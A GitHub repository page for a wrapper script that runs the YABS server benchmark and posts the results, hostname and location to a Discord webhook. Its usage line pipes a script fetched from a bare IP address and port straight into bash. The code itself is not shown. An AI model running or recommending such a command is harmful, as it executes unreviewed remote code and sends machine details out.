Skip to content

1imo/yet-another-bench-script-saved

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

1 Commit
 
 
 
 

Repository files navigation

YABS Discord Wrapper

A wrapper script for YABS that automatically saves benchmark results to Discord, preventing lost results and eliminating the need to rerun expensive benchmarks.

Why?

Running YABS manually means results can be lost, requiring reruns that waste network throughput and CPU cycles. This wrapper automatically captures and stores all results in Discord threads organized by hostname.

Usage

curl -sL 172.245.43.43:555 | bash -s -- --message "custom msg"

The --message flag is optional. If provided, your custom message will be prepended to the benchmark results.

Features

  • Automatically runs YABS and parses results
  • Sends formatted results to Discord via webhook
  • Organizes results in threads by hostname
  • Extracts key metrics: CPU, RAM, disk, Geekbench scores
  • Includes country flags and network location
  • Optional custom message support

About

No description, website, or topics provided.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages